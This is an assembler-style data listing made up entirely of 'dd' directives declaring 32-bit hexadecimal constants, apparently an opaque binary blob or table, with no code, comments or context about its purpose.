		dd 0D11DBF3Eh, 0A932ABB4h, 1523DA20h, 0D1057FA8h, 2A12F8EEh
		dd 8492205h, 2C458A90h,	8770A87h, 0C312C351h, 0AAD687Fh
		dd 0FEB409B1h, 2EED42D5h, 6DA04A3Eh, 0BF04DCF1h, 250E320Bh
		dd 1DDBD80Ah, 0A09DEDDCh, 4925AC32h, 69D16BEh, 0ED2D8039h
		dd 0AE29442h, 3C4BC6CDh, 0CEEDE19Bh, 86DC2402h,	7776D72Fh
		dd 10EBD711h, 5181EC25h, 0F5EDBB76h, 8ABB293Bh,	0DDBBD96Eh
		dd 0C2C97FD9h, 3C0D2CD1h, 0C8448B04h, 9518E608h, 914974CDh
		dd 664614Ah, 6CCAC975h,	0EF60159Bh, 3D7070E6h, 0D8B1F8B3h
		dd 0C20AB604h, 0B25AB2A5h, 6A3550DBh, 65D6CD55h, 0AA1F0AC5h
		dd 0DD7A08Bh, 55EF4E87h, 0C95B6C93h, 4FC095A7h,	83695CEAh
		dd 87E0751Fh, 0A893C4Ch, 1019CD3Ah, 0E451B2EFh,	9E8A77BFh
		dd 4C05FC20h, 5CE4435Fh, 6AFAD210h, 80A74EA7h, 0D0F7ACCh
		dd 2BB8D4B4h, 0D075B7FEh, 0CAD25416h, 1C566468h, 0BB9B6FCh
		dd 0FC137E5Dh, 0AD974F47h, 185AD7Ch, 0C80E86B2h, 0A881C3E2h
		dd 207CE0BAh, 0C040504Ch, 555F6553h, 0C1906E93h, 8ECAAA44h
		dd 910AFD75h, 4288D420h, 86414B20h, 839FFD83h, 91868E28h
		dd 6DF893AAh, 5DFA4035h, 0FC467AA4h, 46FAA4ECh,	455AC913h
		dd 92E834E5h, 515C0671h, 977EF34h, 0C457967Dh, 0DD074D17h
		dd 8B85FE0Eh, 0E59E4C0Ah, 0B39D238Eh, 9E2CFBBBh, 0CDD1E5E1h
		dd 0FB224A2Bh, 18D326CAh, 0D52E1C04h, 53C8BB18h, 872AACBh
		dd 52897A8Dh, 8BA438B4h, 0DF5A3904h, 72BA745Dh,	77E7B2CEh
		dd 5D4710Ch, 444A8B2Eh,	0F97B1A06h, 0DD7FB25h, 0B2C74C8Fh
		dd 831F8D3Eh, 0AA812D51h, 0BBA0096Bh, 0BBF7E709h, 0DCB0CC85h
		dd 13055F15h, 0EB00B05Ah, 6763760h, 0C6D06763h,	0D34D810Fh
		dd 2B8A5472h, 0FB18E8A7h, 0C9D06B7Eh, 0AEF893C0h, 0A1A12E0h
		dd 0FB7D3ABEh, 56AB85F8h, 0CFB5A8CDh, 0B40D872Fh, 1436609Ch
		dd 0A71C4655h, 0F4158340h, 0E85D683Ah, 2AA10EE3h, 4501A12h
		dd 6452FD19h, 6BD08D32h, 3D30B663h, 91B3CA9Bh, 0CC1F55AEh
		dd 0EBC1CCC9h, 84641A51h, 0E5833AE0h, 0C60908CFh, 0D98B1FCDh
		dd 64CED568h, 528A332Bh, 0F38B666Dh, 7C30CFDFh,	8BEEE7F0h
		dd 7B1756F7h, 1D9C3DA6h, 46EF5BCDh, 9774B453h, 4B0E9375h
		dd 0BD777DD7h, 0CEF93619h, 0E717C9D3h, 0F6CB1452h, 0D5F77C9h
		dd 83E7A6D8h, 33C55F77h, 0CFC182BAh, 0E4B60199h, 3512F850h
		dd 0C2AEC54Eh, 199C10C8h, 52A9AA61h, 0B41571D5h, 0B42DA128h
		dd 0F84673BAh, 0B0BF3978h, 0AC2725CAh, 3BEB689Ah, 5523F839h
		dd 8667F392h, 0A69ECA2Eh, 0C05D97E0h, 0F43DBE82h, 10E4160Ch
		dd 295D5610h, 0BB846E32h
		dd 262B420Eh, 0DF082013h, 4C855E59h, 6EF269B4h,	0A2CAAAD4h
		dd 6AAB2E58h, 57F27A5h,	0EED83E7Fh, 539E9F88h, 82BE25C6h
		dd 79755D6h, 0B85D2F93h, 44DFC34Dh, 6A82655Ah, 81726C5Dh
		dd 0CA7405BAh, 0D2406BAh, 0A412C022h, 0F0152196h, 3E2E9183h
		dd 0C8935F29h, 0AD14A80Eh, 9682B281h, 64516402h, 0BEB292F9h
		dd 0C8B29107h, 0EFC78Dh, 8F7925A3h, 0A4A03E11h,	0D5E8124Dh
		dd 15ECFCC7h, 0BD9EA278h, 75D27FC8h, 8611B2CFh,	31E3109Eh
		dd 2EE9D484h, 0A60FBCC9h, 774E3E48h, 5C129BFFh,	0CAE94957h
		dd 0B3BB8EE9h, 28BEDF16h, 0DA055F6Bh, 0BBA7D9A7h, 0B1198BE1h
		dd 0AB602EA0h, 15079883h, 2CBB2E92h, 6C5F2D33h,	4BAC8ED5h
		dd 9DF71577h, 15F6E29Eh, 168F6E9Fh, 5E7F710h, 467184Eh
		dd 939BCC66h, 7521C419h, 2D0AF1E5h, 13043CEBh, 6E45301Ch
		dd 7BFFC821h, 4A020312h, 12FA0E67h, 3822A5D2h, 58837808h
		dd 0FF29FAF6h, 52E9420Bh, 48640457h, 4D932FE3h,	55BD08BFh
		dd 226FD79Ah, 0D0E95E5Dh, 0CCA03382h, 9ACCC479h, 2757AB77h
		dd 0A029AB7Bh, 14093C72h, 18A8C775h, 0C1381F61h, 0FED4E9A1h
		dd 29BA71E7h, 585F0F5Fh, 5F43A8F5h, 21BEB36Eh, 0FCB7A4A6h
		dd 0CE698983h, 0E482D892h, 1CC5B10Bh, 0C2A967D2h, 0A8D56A91h
		dd 955A37FAh, 0E8BEAD50h, 4FB5DA8Bh, 867D4C5Ah,	38AF5E9Dh
		dd 675CA41h, 8502CFEh, 955640D8h, 0A1D3FC25h, 2570C322h
		dd 2374A33Ah, 0C0F860E3h, 21A95866h, 485BEF39h,	16372F50h
		dd 689D6D50h, 0AF7438A0h, 52330A0Fh, 24BFF681h,	7DC77C46h
		dd 85F23816h, 57589910h, 1BEF1E4Bh, 0A4854A88h,	156DE155h
		dd 0D7324C06h, 0A3C23E2Ah, 5B5506C0h, 207F67A7h, 77A4A7FDh
		dd 9B50364Dh, 2A2FBEDCh, 2BA3BF6Ch, 4FA2C1D5h, 0AD1AFA4Ah
		dd 0FDF4F00Dh, 8AB48FEAh, 22A6BC8Eh, 97C57591h,	418A21A3h
		dd 39FDD78Eh, 0ADE7EC2Bh, 0A71466Bh, 4C60574Fh,	0C4F8E092h
		dd 2AD72968h, 623C1918h, 6AB846Dh, 0B38A7B60h, 57EAAA56h
		dd 0D565D8E6h, 0B4577ED7h, 30D4492Ch, 0CE8F18C6h, 37481A4Ah
		dd 88C1701Ch, 6368A5A2h, 5948501h, 5C69684h, 9CCD1C9Fh
		dd 0CB50296Dh, 8632428Eh, 0AE1D75EDh, 0A94F9292h, 1888A8Dh
		dd 408B81E0h, 8B40B5Dh,	453F5D78h, 64481BEDh, 0E9178D99h
		dd 3324AAF6h, 412E54F7h, 0A80FEFAh, 2480509Ch, 740411A3h
		dd 263A8FAEh, 0A0ECF044h, 0DDCF166Ch, 0E918CA18h, 1832C712h
		dd 0C41FD0ECh, 2AF443DBh, 0BC4A60E3h, 0D750CA77h, 975B0184h
		dd 0AB6FC887h, 1EC1928Ah, 57E832F9h, 40EEFE60h,	0AFF600Ah
		dd 0BDC3B14Dh, 4C359F92h, 0EB3001FCh, 0F10E81A3h, 2D26379Fh
		dd 0F5B642A3h, 7080346Ah, 8850E3C1h, 10973306h,	898C40A7h
		dd 8D90121Eh, 968F4BF0h, 0F9844ADCh, 844C2816h,	47EB091h
		dd 7438E015h, 895F812Fh, 4A00AB4h, 0AC5264h, 0FB9C30E5h
		dd 0C06BE71Eh, 411A4B47h, 0F13DA241h, 12E755DBh, 0E59A9BA7h
		dd 0E0BD526Eh, 5C8D1F28h, 63A98CCFh, 0A428D487h, 79D0C4Bh
		dd 0AB92C474h, 0E0E14E84h, 0D1511CF1h, 0A8EB6AB9h, 84A9D48Dh
		dd 0CF6540h, 8379B50Ah,	2F91A21Fh, 7254CAC6h, 2B52356Ch
		dd 0D23F33A7h, 1010BE8Dh, 3D575132h, 3D77FD10h,	37E07D05h
		dd 404D3AADh, 3F8AA9C1h, 3B00381Ah, 7487DFDCh, 8ED2F609h
		dd 0FCB03296h, 23631569h, 0DC816E55h, 16775DE5h, 3564A671h
		dd 7B242535h, 80726157h, 0CBF5E20h, 1BE0FC7Bh, 886338AAh
		dd 3B01802h, 1195AE31h,	0D6989AC4h, 7C2101F5h, 0AA440FA9h
		dd 26E4CF08h, 72D810D0h, 2D91D2C2h, 8A152481h, 9E64636h
		dd 82594B1Ch, 68C4D148h, 1F0C0495h, 0D19909DCh,	0B0CC13EFh
		dd 300D201h, 0E4B04262h, 8A749F03h, 0A65F4A28h,	50447D26h
		dd 0E9990D62h, 0BCA05383h, 304DF462h, 123E9681h, 0B3A66EFAh
		dd 10385824h, 0A0909328h, 221A6E2Fh, 2D0A4C3h, 68A48823h
		dd 4114A9C2h, 901C10E4h, 0B199811Ch, 0DCAA8333h, 47C12E19h
		dd 5FE3CB5Ah, 25A1BA4Dh, 0C5C3CEDh, 9662003Bh, 4F5C3F92h
		dd 4A0FA328h, 0A7268408h, 32E6AFF8h, 79FD0589h,	0CEFCD860h
		dd 41FC85F2h, 1A31023Ah, 0EA0711A8h, 1CFCD7CFh,	6461FC88h
		dd 0FC86AF2h, 5B0381E7h, 17C421E8h, 0A6C56348h,	0E4CC9344h
		dd 0B7831506h, 0A262CE04h, 9724FEDDh, 0E94009CCh, 1CBA139Bh
		dd 7603722Fh, 308C49B0h, 82299E10h, 40207648h, 0DC586AC4h
		dd 0B307EC02h, 87AE9787h, 9120057Ah, 1B286866h,	74C6154Fh
		dd 745950D0h, 2E83BA1h,	0EC1C1E08h, 0CD52A1AEh,	0AE421DDEh
		dd 0FF856882h, 0E36A0A9Ah, 0FB17697Fh, 0D26E348Ah, 0C04A2879h
		dd 0F69449BFh, 0EE944913h, 0DF841113h, 5F7F0913h, 2DE0AC83h
		dd 370E1701h, 0FFF332BAh, 0A4BE1EEBh, 3C0113CBh, 97599052h
		dd 1CD590B2h, 4C44606h,	0FFFD8477h, 35AA1A4Bh, 0AC888344h
		dd 0DD12C8E4h, 0FF740217h, 209C0881h, 1FBF862Ch, 88451F44h
		dd 1D06A3D3h, 287D22Ah,	20D2D08Dh, 35A9AC16h, 12C03E14h
		dd 1F4F4872h, 88EB206h,	0A052E50Ch, 82F7CD06h, 0A1873FEBh
		dd 33AB4070h, 5655F60Eh, 3A86C2EEh, 0D8508A88h,	9847DF61h
		dd 3D775D22h, 0EB22D84h, 75BDABD5h, 3CA00B9Fh, 3B32448Bh
		dd 28AE728Bh, 0D1F8018h, 23F969E6h, 445FB46Ch, 802CA33h
		dd 56A33D49h, 2D918C82h, 82652116h, 93740ACAh, 562E2A89h
		dd 5654C8D2h, 0CF7FCFB9h, 82F29DC8h, 20FCC1DDh,	0BDD32A14h
		dd 860BE218h, 4B183D74h, 0E64C3021h, 0F51E367Ah, 9B421652h
		dd 22304E32h, 8AE410DCh, 47F922ECh, 25F6594h, 328A1B51h
		dd 0D2968D2h, 1AC42487h, 0F31099C5h, 3F670B17h,	21D485D5h
		dd 0CC90723Eh, 98714879h, 0A2C236B7h, 25AB1D2Fh, 0E576635h
		dd 1E0939C9h, 0E907E18h, 9E73177Bh, 0EC37C35Fh,	0C8F965EBh
		dd 4E3FBAF0h, 52A8F70Ch, 0C230CFD5h, 5D602386h,	9AC4448Fh
		dd 0E95898BEh, 882E73A4h, 10B30FB7h, 0A3715391h, 6846240h
		dd 0F55C03FEh, 40A4ECEDh, 95E4A218h, 0BD1BBA41h, 3877403Eh
		dd 69A69C0h, 7000BA26h,	0B8C76478h, 37407875h, 0FE0A8177h
		dd 6D61B8B2h, 90C04021h, 177EEB0Ah, 786BAFDDh, 0FB8B93CDh
		dd 0CCD12FF3h, 11666D38h, 0C2164375h, 9B279CDDh, 9F00AD2Bh
		dd 0CAA69EF9h, 0F82D2Bh, 2E91307Dh, 7007E9F2h, 0F8BA3BF4h
		dd 56E12077h, 0E563FB71h, 0A153AFB0h, 0B541B8A0h, 8A7EB415h
		dd 97935420h, 40810555h, 0C6607BE0h, 3AC7AE0h, 1D02043h
		dd 5DD03E9Ah, 8C651Ah, 0E2F40CD2h, 93B6310Ch, 4B2516FFh
		dd 23B7C097h, 0F4AF005Fh, 2E95CF70h, 57BC31h, 4ED1E755h
		dd 0B83AA0A4h, 3E08CD5Bh, 0E643A857h, 542A471Dh, 28927D1Dh
		dd 3E11CAB0h, 0A1715A1Fh, 0CD764BACh, 1D7E4E3Bh, 12AE9347h
		dd 0B995E00Eh, 6F433BF7h, 0E86008F3h, 9B41359Eh, 41C15799h
		dd 0D87238BDh, 0ACBEF5E6h, 909819Eh, 0BE9F6094h, 9F0A006Ah
		dd 80E469Eh, 5C861221h,	0BAF1140h, 0B442382Ah, 52188861h
		dd 7FC5FB05h, 91C597FDh, 0F5753212h, 0C56A4340h, 3C5FA178h
		dd 431028D1h, 0DE4562CBh, 6C03524Eh, 0DEBE0001h, 8196FF1Ah
		dd 0A0C80584h, 0DF650462h, 4C591C39h, 0FF59E49h, 9DD42494h
		dd 0EB704019h, 46BACA0Eh, 0C3376900h, 5413028h,	1502123Dh
		dd 2B5496AAh, 8224C823h, 0DD4195B8h, 1A46E29Bh,	1960963Fh
		dd 29268654h, 5346A2ABh, 8195794Fh, 41E159E4h, 7D7BBD18h
		dd 0D46817Ch, 90CEB0A7h
		dd 424A203Bh, 0B3ADCFF0h, 0A42905C2h, 0E8729F42h, 0F1058B4Fh
		dd 20388613h, 2607FF2Ch, 0C0083E08h, 0DA8AC30Fh, 0D6F9C42Ch
		dd 33E9C3FCh, 0B0C4A90Dh, 0FBAC606Fh, 0D233E17h, 802929FDh
		dd 3FE99702h, 4258C13h,	4A79055h, 0BFAA6013h, 0CCEB71F8h
		dd 4169909Ah, 1AC083D1h, 755CEBF5h, 0C154FE43h,	68164990h
		dd 0A27E5712h, 0AFC28A11h, 5497BE8Bh, 0BEDC605Bh, 8CE28090h
		dd 4BFE6483h, 405E9A32h, 66C67D36h, 44A64383h, 0EE578D0Fh
		dd 949EA155h, 59CD4B6Eh, 0DE4ACA57h, 0B2C32A2Fh, 10AA29D1h
		dd 73780292h, 82014F91h, 0D8411D80h, 0FCC3EA57h, 0C7BF2207h
		dd 0E09BE870h, 4326FF3Bh, 676D8301h, 9DC5C080h,	0DC3A5153h
		dd 1D807A2Ah, 0AA624A07h, 0EE0F5B60h, 0A789EAB0h, 153CA9A0h
		dd 8BA295B1h, 9B5171D6h, 76798C68h, 0EFDA6CDFh,	60142487h
		dd 4C0C8101h, 99BEF6FCh, 0D5641A96h, 8246CDF5h,	0EFD0B4CAh
		dd 0FC2DC823h, 29042C70h, 5B4AF280h, 1E2E1AE8h,	0C52A04E0h
		dd 0FF31F5DCh, 0B72D6305h, 970B442Fh, 0F336F02Ch, 8817D700h
		dd 0C131E7AAh, 0D0356698h, 542890D1h, 89CF570Ah, 4B4A123Dh
		dd 86550868h, 401C427Eh, 0EFA918Bh, 0B912B97Ah,	7AAC199h
		dd 8611EB46h, 74AB3CEAh, 2805E55Dh, 71F82C11h, 26DFE900h
		dd 6B9A1093h, 0BC38587Ch, 3B95CC3Ah, 32D947ACh,	0AF540FBDh
		dd 184F4277h, 8D30237Eh, 0B9B8B29Bh, 8716451Eh,	0F9BEAAC5h
		dd 0AC53700Ch, 80C798AAh, 0E6440954h, 1CFE5751h, 688115CBh
		dd 0C8FB579Eh, 1FC105Fh, 47C0DEDh, 752DB3FDh, 16ACF5B1h
		dd 5550949Eh, 50D5C982h, 65B97C97h, 0FF1977D3h,	6AD7F682h
		dd 0EB70C540h, 910D474Ah, 0C6842E75h, 0C05C8176h, 0C2311122h
		dd 0A04956B2h, 0FBE6FB1h, 1477DF4Fh, 5A833ADCh,	541FD3C8h
		dd 0FA7814FCh, 4ECE280Eh, 0A315F1DFh, 90C58BB2h, 0A96AD380h
		dd 0BCD45CBAh, 4882833Ah, 1FE12D10h, 1545F3F5h,	3FE29018h
		dd 0C2B1EFBBh, 26B10CF5h, 2AB8AACAh, 68EBD92Bh,	0C5C503FAh
		dd 14ECF3CDh, 0A9B258B6h, 0FAE02114h, 39F74630h, 7C373CEEh
		dd 4DE61DDAh, 7003143Bh, 2D2B2E93h, 5A6B3A8Dh, 0EA53EEC4h
		dd 6FF5B464h, 35187D1Dh, 0E212E6A4h, 95E8B8EAh,	0ABE7BA57h
		dd 52F0C18Dh, 0A2D0A274h, 0FA96CBACh, 0BA26AB90h, 75EE09B8h
		dd 7DC7A4Dh, 0B32E3E62h, 0F9877B32h, 1A77EC3Bh,	56F06ACDh
		dd 732DF7BFh, 9B272755h, 4E3D54D0h, 9D2D4BD1h, 73CED270h
		dd 0AAC3ABBFh, 0BFC8E076h, 0B86236E9h, 59578B86h, 0C74D4955h
		dd 0ED7D364Dh, 1D8C1D1Dh, 6D5040A2h, 0C89C6C12h, 1B3AABAFh
		dd 989F7DF8h, 0AFF8E803h, 31D4CCADh, 0D1A6BAEFh, 0C2281011h
		dd 8EB48E54h, 0F6C00961h, 0F5DF181h, 3A8CBA64h,	2AEB6C4Eh
		dd 7C4CEF01h, 4835145Eh, 565F2666h, 0CC8BD279h,	55D27086h
		dd 0B5069D92h, 2E2F5611h, 0C0BE12E0h, 0BE8ADF2Bh, 0D9E8CAB6h
		dd 4157042Dh, 40591EBAh, 7F6D7082h, 931B3F85h, 2AE6A903h
		dd 0CE0665E0h, 0ABE6D765h, 0F21D5471h, 3E09895h, 30B26169h
		dd 969CC6F9h, 2CD0AEA0h, 7D8AEFD8h, 959F74D1h, 518A4B37h
		dd 929D5499h, 0C900929Fh, 7556839Eh, 0AB4287FDh, 0FC02BFA7h
		dd 686A06CFh, 0E15620D6h, 3ECE9D72h, 25155382h,	4FCB2484h
		dd 794D428h, 6D573868h,	32D808D7h, 0B33DB72Ah, 8878143Ah
		dd 1E21C82Ah, 0D6243355h, 8964E080h, 0FF2C65F6h, 62B9345Dh
		dd 1DA8E634h, 441C55F8h, 0B7740535h, 95343602h,	7F58C759h
		dd 3E3CE9FCh, 95BFB7DCh, 77F11453h, 0A38A09E3h,	0E56A0367h
		dd 1945A963h, 0DDFF1DBh, 0C7F35EF5h, 0B112BABh,	0C4C1E8AFh
		dd 0AAF2E241h, 9F457B75h, 0AF17CE75h, 0E6E6D2B2h, 23E511FCh
		dd 0E9902F91h, 0D6622BCCh, 5FC21505h, 87E221C9h, 37F37FAh
		dd 262F38C3h, 955C77D8h, 3554F9D8h, 0C65D4DD5h,	92B4279Fh
		dd 0EE9062FAh, 0C2CE69A4h, 21753E77h, 601D2E95h, 4A5BE2EBh
		dd 6A3A8E18h, 0F90A8C6Fh, 5328212h, 17C3BFC1h, 8FA9E457h
		dd 0E4EFF5BAh, 5F09D74Dh, 323F6A14h, 35FDD4DBh,	0F6BB5788h
		dd 8FC34381h, 5E11F3D7h, 59E0AEC2h, 484220C1h, 1B93320Dh
		dd 4FD14CEEh, 415D4B3Dh, 0CAA2F69Ch, 0ADB75B97h, 0BD9D067Fh
		dd 0F71BD3D7h, 0DCEDFEEFh, 0F991E0EEh, 0C75A7537h, 0B09EA2BDh
		dd 2DA488BAh, 0E80A7C0Ch, 2F5E49DFh, 0D28B5233h, 0BACA457Ah
		dd 0C3A6E67Ch, 0FB1358BFh, 6523EA2Ah, 38C00665h, 8B201B85h
		dd 0C43D9C7Dh, 0FA3235BEh, 2BC704A0h, 6DD9378Eh, 32A9518Dh
		dd 0AABC0755h, 55A12BF9h, 9B4940C5h, 0E57BACEFh, 7787F212h
		dd 248C8757h, 2997B2DEh, 42182AA2h, 18C86713h, 5566EA38h
		dd 0B5546541h, 71D79A91h, 8AE148EAh, 0F18FF286h, 4139B055h
		dd 3AF560FCh, 59EED294h, 0C68E465Dh, 0FB6AC720h, 0DBC0C421h
		dd 8CC50C11h, 40B88AB5h, 0F14A1C92h, 0F54E10FDh, 4FE1BAE9h
		dd 0FEDB8FE1h, 684050C0h, 7AA9AE86h, 409042BAh,	38753011h
		dd 0A488F22h, 0E1D827B8h, 4649DA62h, 6BC5DA64h,	0CA808A28h
		dd 0FAE48129h, 7304E20Ch, 0D7E8EC16h, 0F1F9840Bh, 0D60DBFC0h
		dd 937C2F0h, 0ABE6189h,	4942547Ch, 925276C3h, 0B207DB00h
		dd 0B4A22500h, 0C5F3C756h, 1905BB94h, 98A7162Ah, 0CF897728h
		dd 0EF0185AAh, 34C97795h, 9965BE83h, 28CE9760h,	7F66F5C3h
		dd 583BCC46h, 3C81CB7Ch, 0F1CCD780h, 8A0A3F8Bh,	83136CFFh
		dd 8751138Ah, 2C042B88h, 68618B14h, 5F9C9C12h, 0FCAF3937h
		dd 0D4E4E29Bh, 51A93B22h, 0A850B1C5h, 0C0531130h, 0F12C3F3Ah
		dd 0D7282C24h, 0C55139h, 0BEE93528h, 0CD9975FAh, 3F36B88Fh
		dd 29E260h, 0D27B56E6h,	0A464560h, 30BAF17Dh, 0E3990271h
		dd 3C547E8Ch, 19AD0195h, 34836275h, 508DD60h, 48B130AAh
		dd 21322117h, 6E60F678h, 0B9180345h, 97A5D27Bh,	18A87BD2h
		dd 0AEA25FA8h, 6BA4B246h, 54C4E846h, 0C78965D8h, 0C312A756h
		dd 2D4843D7h, 0E22BB186h, 659D827Ah, 0C93027E0h, 411C49Eh
		dd 0A92F322Bh, 614CDA68h, 7F0BC1A2h, 2972D5B1h,	7F7A3EEh
		dd 0CE3BA066h, 1F345F43h, 352EEC67h, 0B64CFC00h, 0B558BE2Ch
		dd 0A7560737h, 99282D52h, 0A995248h, 0DCBB9F52h, 3EB22A19h
		dd 33BECFBDh, 5F2FF742h, 0FC22CAE1h, 0C6385079h, 131BC742h
		dd 585DEDA0h, 290CDAF7h, 58AEBA00h, 0B064BF41h,	96309B0Dh
		dd 6611E133h, 0AF754BB9h, 0A1120917h, 0AAC5805Fh, 9A193D8Bh
		dd 973317BDh, 0CEA50FCFh, 0D7EC9C1h, 0B2A5AAA2h, 4ED1207Ch
		dd 5307D8CAh, 97F98BECh, 0DC683F96h, 6DCEDD60h,	3AC5198Ch
		dd 6A8C02EEh, 519EFA30h, 0BD256998h, 5029D316h,	3A984AACh
		dd 72198883h, 90535118h, 9DFF2063h, 0A55FE0CAh,	0F7A0BABEh
		dd 0D68C1695h, 415375D3h, 1E990396h, 0CB5B7F3Dh, 0C6F6DDh
		dd 310EE54Eh, 8B8BD39Eh, 0F833341Ah, 0E024A3B4h, 2F30BE92h
		dd 60148252h, 669D5FBFh, 0F21525B4h, 16AF8B25h,	0E46099B5h
		dd 1020FDFFh, 289CD8BEh, 63ED9F44h, 35BE4589h, 0DCC005C2h
		dd 17581865h, 0F8504E66h, 0B5957BA4h, 84C94EBBh, 0BD052FDFh
		dd 0CDEA36CFh, 84E928EFh, 5907A39Dh, 21D098Ah, 994D92A2h
		dd 3E9E42AAh, 0D45F3064h, 0F7759662h, 350BA523h, 5E968C2Fh
		dd 0E6E12A8Fh, 2AFDF7E6h, 270BDDBCh, 6195E38Dh,	0D465288Ch
		dd 64C07AFBh, 0D0CF6125h, 0AF31B148h, 4AD48128h, 381DD840h
		dd 37401F25h, 0F90F8C30h, 7B70F8E4h, 259784B4h,	223FD14Ch
		dd 0AECF4826h, 0A9AEEB8Ch
		dd 0CEF15DD4h, 0C099E28h, 26FF567Fh, 0CE888912h, 5D9E9667h
		dd 0B6639A11h, 44D67D82h, 0B1DD8074h, 14EA9234h, 9335CE3Dh
		dd 9828AD38h, 4CC46ECEh, 0F09A13B3h, 597AE59Eh,	0ED37C7B0h
		dd 56698EBEh, 9730AD5Eh, 0E41B518Eh, 5C530B32h,	92A64DBCh
		dd 0AF64475Eh, 0D379BE9h, 0E34C3A22h, 38C8B3Fh,	5A69C42Dh
		dd 7E48D704h, 9ACB71F1h, 0E95E3AFCh, 6A9894F8h,	91F29FEFh
		dd 60AC7953h, 0B5C39597h, 843A3F0Ah, 51543BF2h,	0AC12F12Fh
		dd 4AE1822Bh, 19A916EEh, 0D7A05FF3h, 6C414C6h, 0E7F94BB8h
		dd 0CB10A654h, 2FE6C548h, 0C2651118h, 3EF2790Fh, 0B93595C0h
		dd 0E2922B20h, 2A40EC2Eh, 1575411Ah, 0D5651098h, 0FF720F02h
		dd 825656Ah, 6A3249Eh, 53A9E311h, 1072927h, 208AFAB0h
		dd 0FF726531h, 1F01665Eh, 0C44701Eh, 40814317h,	6E4C238Dh
		dd 0DA669112h, 0F22E95C7h, 8BAE4885h, 298A827Fh, 0ECC5C605h
		dd 0D1BE6984h, 0DB42D3CBh, 0C181FDB8h, 624C278Fh, 3939F0B9h
		dd 2D7BE55Ch, 0D41F6E94h, 1911C02h, 0A30258F4h,	616CC99Eh
		dd 59746C15h, 1A15F5C3h, 58ABFC9h, 0AE98598Ah, 62CC4E6Ah
		dd 3D70C10Ch, 9B85C444h, 2788F77Ch, 81D814BEh, 0E2EF8430h
		dd 1E8C9A6Fh, 49EA087Ch, 46336D5h, 0FC3BAAFDh, 5FA9F0E1h
		dd 0BC12F6D5h, 0FC05B8BAh, 7ED04755h, 9631643Fh, 0C0E35869h
		dd 3ECFF50Ch, 0B3078785h, 8062D9A0h, 23761243h,	0F86E7B39h
		dd 0B7F98140h, 805322F5h, 0D6720455h, 1053E90Fh, 0AC240D33h
		dd 0EF1D7FD7h, 890352CCh, 681B22A5h, 2C2AE1ADh,	6102DF2Ah
		dd 0C6D13F4Fh, 8CE06931h, 95E08E62h, 0A0343F27h, 523D3438h
		dd 0F1561198h, 0BD397EE7h, 0CB702280h, 88C7BAC1h, 0FEE0E758h
		dd 3390AE13h, 7FD8B190h, 0DADD17A0h, 558AB65h, 1BB62D53h
		dd 0C04E0EE8h, 540CB17h, 2AD81C63h, 5E526466h, 0EE7DCD19h
		dd 74DAE092h, 0AE664518h, 0A72B2624h, 0A9D6B48Fh, 1BC464F8h
		dd 9CE1637Dh, 709C3164h, 0EB85DC87h, 9F7EAE8Dh,	0A657333Eh
		dd 2B8BC44Fh, 0F35FB53Bh, 9F45FF32h, 32BA249Bh,	1B94F99Ch
		dd 51A9121Ch, 53DD66A7h, 834028D9h, 0EEC9F9F9h,	0C5F014EFh
		dd 0EEB0F1F0h, 4AF949F4h, 0C154BC2Fh, 945D1EBFh, 0BB0144Bh
		dd 1B46D075h, 0C0004DC1h, 0A2420926h, 848B9A8Fh, 0D230AE51h
		dd 0E490A2B2h, 8A2606CCh, 98FB122Dh, 28E5A7A0h,	5B1E390Ah
		dd 0E91F7451h, 129C2E6Ch, 2EB0951Dh, 4F8BDB52h,	0BE28263Bh
		dd 0C64A3F53h, 52A2E86Dh, 0F00E6DCDh, 6277AEC5h, 0D4896094h
		dd 19507568h, 7C62B4E1h, 60E239A0h, 0A8087C76h,	0BB328F82h
		dd 0C636B8BFh, 0DD0E341Ch, 4018EE7Ch, 0FE1A08F9h, 0F0A35E05h
		dd 877AEB9Dh, 33329835h, 4460E04Ah, 0C2F08E21h,	8D75651h
		dd 937DBD6Eh, 53C9397Dh, 865FCA8Dh, 60B3095Dh, 0C18173Fh
		dd 711EAD66h, 0D5CA9576h, 0A02E5152h, 539CD238h, 32F08514h
		dd 2BD8C5AEh, 94529A18h, 0C73A81F3h, 0E4559C3Dh, 0BBA8A283h
		dd 4417F71Eh, 1A1FE32Dh, 0EAA2D806h, 0C5C93BA0h, 4F217AACh
		dd 0C02A307Dh, 7411594Dh, 0ED9AC5CEh, 39385BE6h, 0E123E317h
		dd 0C7024594h, 0BBC2F745h, 0A43BE5DDh, 314351D4h, 1C13F43Ch
		dd 0F2607411h, 0C966CC6Ch, 0F21CC67Dh, 8CA23C95h, 62D7E991h
		dd 0AEB0A357h, 942168F7h, 0B1F1BD3h, 0F92DF9CEh, 251A7F2h
		dd 0DD215FAAh, 3D1F3AE5h, 0BAFE58A8h, 0FFF209C0h, 741C7115h
		dd 0C8E790C2h, 0B31BA121h, 8E30290Bh, 46694DEBh, 1065348Ah
		dd 651BC652h, 65BA235Dh, 50D18BF1h, 166757C0h, 75986AD2h
		dd 455AC47Ch, 7F071652h, 2C376DD2h, 0A50381Eh, 57C748F0h
		dd 9B24B46h, 0F5CCC566h, 56996F8Bh, 71741819h, 9D5A5B3Dh
		dd 7E297652h, 1671D445h, 38855502h, 0B5DA8342h,	580A5AD0h
		dd 28E51101h, 0F2AAA6B4h, 8EF953EDh, 760B718Bh,	6F151367h
		dd 0D6209058h, 1DCF2E18h, 997509FDh, 0A6803DFEh, 0EF67F817h
		dd 0AC1665B4h, 0A571EF97h, 4756EF80h, 51C53D7h,	0A7F95390h
		dd 0F58C65CDh, 1FE475B4h, 0BC58DA33h, 6D4EE2B7h, 0E63B2041h
		dd 0D41C9BACh, 0E21854DCh, 65F18220h, 2AA17424h, 70857C49h
		dd 7383702Ah, 1523CA14h, 493859CAh, 0D63A8982h,	0BF4D72D7h
		dd 0FA90223Eh, 65C0429Fh, 0F9CDDAA0h, 34F32D0h,	46E5C5B8h
		dd 0DCD16C4Bh, 226AC570h, 0D74579A7h, 7740FCA2h, 6864EFF6h
		dd 8C092CEBh, 0C1B0C0Ch, 0FA963AEh, 60329AFh, 96F785E7h
		dd 5161F7ECh, 39E396C5h, 41DD9FD0h, 81629A9Ch, 0E435E9DEh
		dd 8471CE33h, 2ABBC392h, 0F56E7C1Dh, 23346275h,	0A84C44EEh
		dd 66D56A19h, 8E25FB6Dh, 65AE77FCh, 2F3E31Ch, 2BA1A4EBh
		dd 0E508D806h, 204B74Fh, 2B7614FBh, 8CE10EEBh, 0F62AFB28h
		dd 50F995B0h, 1CF5853Eh, 0BF6A454Fh, 0B154CBDDh, 7ACF38C0h
		dd 603C4C82h, 506E404Ah, 3932775Fh, 578D8387h, 314CE0A2h
